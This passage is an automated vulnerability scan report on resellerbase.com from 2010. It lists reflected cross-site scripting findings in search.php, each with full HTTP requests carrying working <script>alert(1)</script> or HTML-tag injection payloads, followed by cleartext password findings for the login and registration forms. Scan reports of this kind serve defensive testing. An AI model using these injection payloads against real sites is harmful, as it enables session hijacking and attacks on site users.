Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b082e<script>alert(1)</script>8ba851af2be was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themesb082e<script>alert(1)</script>8ba851af2be/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:50:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themesb082e<script>alert(1)</script>8ba851af2be/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5622. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 83a38<script>alert(1)</script>a9531677bc9 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themes/kosmos83a38<script>alert(1)</script>a9531677bc9/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:50:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/kosmos83a38<script>alert(1)</script>a9531677bc9/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5623. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 97d8e<script>alert(1)</script>4abb94bc36a was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themes/kosmos/search.php97d8e<script>alert(1)</script>4abb94bc36a?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:50:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/kosmos/search.php97d8e<script>alert(1)</script>4abb94bc36a?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5624. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/themes/kosmos/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 39728<a>eaefc980b36 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/web-hosting/themes/kosmos/search.php?keyword=search...&Submit3=Search39728<a>eaefc980b36&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:47:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/kosmos/search.php?keyword=search...&Submit3=Search39728<a>eaefc980b36&opt=2 was not found on this server.</p>
...[SNIP]...

2.5625. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/themes/kosmos/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload adf0b<a>1440e716009 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/web-hosting/themes/kosmos/search.php?keyword=search...adf0b<a>1440e716009&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:47:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/kosmos/search.php?keyword=search...adf0b<a>1440e716009&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5626. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/themes/kosmos/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload ab032<script>alert(1)</script>101dc6743fa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&ab032<script>alert(1)</script>101dc6743fa=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:49:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&ab032<script>alert(1)</script>101dc6743fa=1 was not found on this server.</p>
...[SNIP]...

2.5627. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/themes/kosmos/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload d8193<a>a91d65ddb66 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/web-hosting/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2d8193<a>a91d65ddb66 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:48:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2d8193<a>a91d65ddb66 was not found on this server.</p>
...[SNIP]...

2.5628. http://www.resellerbase.com/web-service/web-hosting/themes/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/themes/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 63614<script>alert(1)</script>6286447e314 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service63614<script>alert(1)</script>6286447e314/web-hosting/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/web-hosting/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:50:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service63614<script>alert(1)</script>6286447e314/web-hosting/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5629. http://www.resellerbase.com/web-service/web-hosting/themes/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/themes/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b5e4a<script>alert(1)</script>27fb916a5ce was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hostingb5e4a<script>alert(1)</script>27fb916a5ce/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/web-hosting/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:50:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hostingb5e4a<script>alert(1)</script>27fb916a5ce/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5630. http://www.resellerbase.com/web-service/web-hosting/themes/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/themes/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 6c2fe<script>alert(1)</script>bb75e36fdc6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themes6c2fe<script>alert(1)</script>bb75e36fdc6/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/web-hosting/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:50:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes6c2fe<script>alert(1)</script>bb75e36fdc6/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5631. http://www.resellerbase.com/web-service/web-hosting/themes/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/themes/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload bf814<script>alert(1)</script>2cf1f2bd5f5 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themes/search.phpbf814<script>alert(1)</script>2cf1f2bd5f5?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/web-hosting/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:50:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/search.phpbf814<script>alert(1)</script>2cf1f2bd5f5?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5632. http://www.resellerbase.com/web-service/web-hosting/themes/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/themes/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 19224<a>1c983599c95 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/web-hosting/themes/search.php?keyword=search...&Submit3=Search19224<a>1c983599c95&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/web-hosting/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:47:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/search.php?keyword=search...&Submit3=Search19224<a>1c983599c95&opt=2 was not found on this server.</p>
...[SNIP]...

2.5633. http://www.resellerbase.com/web-service/web-hosting/themes/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/themes/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 17f56<a>7557db9a4b9 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/web-hosting/themes/search.php?keyword=search...17f56<a>7557db9a4b9&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/web-hosting/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:47:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/search.php?keyword=search...17f56<a>7557db9a4b9&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5634. http://www.resellerbase.com/web-service/web-hosting/themes/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/themes/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 1777d<script>alert(1)</script>d6f7f9ecee2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themes/search.php?keyword=search...&Submit3=Search&opt=2&1777d<script>alert(1)</script>d6f7f9ecee2=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/web-hosting/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:49:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/search.php?keyword=search...&Submit3=Search&opt=2&1777d<script>alert(1)</script>d6f7f9ecee2=1 was not found on this server.</p>
...[SNIP]...

2.5635. http://www.resellerbase.com/web-service/web-hosting/themes/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/themes/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 87fd4<a>f4b3798d1ca was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/web-hosting/themes/search.php?keyword=search...&Submit3=Search&opt=287fd4<a>f4b3798d1ca HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/web-hosting/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:48:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/search.php?keyword=search...&Submit3=Search&opt=287fd4<a>f4b3798d1ca was not found on this server.</p>
...[SNIP]...

3. Cleartext submission of password
There are 3 instances of this issue:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defense and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.


3.1. http://www.resellerbase.com/login.php

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /login.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password field:

Request

GET /login.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 21:27:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9175

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Login</title>
<meta
...[SNIP]...
<br />

<form action="login.php" method="post">
<input type="hidden" name="pflag" value="login" />
...[SNIP]...
<td><input class="text3" type="password" name="password" size="40" value="" /></td>
...[SNIP]...

3.2. http://www.resellerbase.com/login.php/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /login.php/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password field:

Request

GET /login.php/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 01:17:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9175

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Login</title>
<meta
...[SNIP]...
<br />

<form action="login.php" method="post">
<input type="hidden" name="pflag" value="login" />
...[SNIP]...
<td><input class="text3" type="password" name="password" size="40" value="" /></td>
...[SNIP]...

3.3. http://www.resellerbase.com/register.php

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /register.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password fields:

Request

GET /register.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.resellerbase.com/
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 22:57:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9341

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Register</title>
<me
...[SNIP]...
<br />

<form action="register.php" method="post">
<input type="hidden" name="pflag" value="register" />
...[SNIP]...
<td><input class="text3" type="password" name="password" size="40" value="" /></td>
...[SNIP]...
<td><input class="text3" type="password" name="password2" size="40" value="" /></td>
...[SNIP]...

4. Cookie without HttpOnly flag set
There are 122 instances of this issue:

Issue background

